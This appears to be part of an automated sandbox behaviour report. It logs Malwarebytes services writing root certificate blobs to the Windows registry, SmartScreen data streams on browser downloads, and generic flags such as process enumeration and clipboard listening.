Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 040000000100000010000000cb17e431673ee209fe455793f30afa1c0f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c953000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df1400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331330b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3617e000000010000000800000000c0032f2df8d6016800000001000000000000000300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e5190000000100000010000000d8b5fb368468620275d142ffd2aade372000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 5c000000010000000400000000080000190000000100000010000000d8b5fb368468620275d142ffd2aade370300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e56800000001000000000000007e000000010000000800000000c0032f2df8d6011d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3610b000000010000001200000056006500720069005300690067006e0000001400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331336200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c9040000000100000010000000cb17e431673ee209fe455793f30afa1c2000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa1400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f00b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd250f000000010000001000000065fc47520f66383962ec0b7b88a0821d190000000100000010000000e53d34cecb05c17ee332c749d78c02562000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee020f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 5c000000010000000400000000040000040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee0220000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe\:SmartScreen:$DATA C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 757333.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 939845.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 487311.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 263289.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
